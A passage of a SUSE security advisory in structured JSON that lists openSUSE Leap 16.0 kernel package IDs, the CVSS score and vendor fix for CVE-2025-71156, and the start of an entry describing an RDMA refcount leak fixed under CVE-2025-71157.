"url": "https://bugzilla.suse.com/1257167"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71156"
},
{
"cve": "CVE-2025-71157",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71157"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/core: always drop device refcount in ib_del_sub_device_and_put()\n\nSince nldev_deldev() (introduced by commit 060c642b2ab8 (\"RDMA/nldev: Add\nsupport to add/delete a sub IB device through netlink\") grabs a reference\nusing ib_device_get_by_index() before calling ib_del_sub_device_and_put(),\nwe need to drop that reference before returning -EOPNOTSUPP error.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
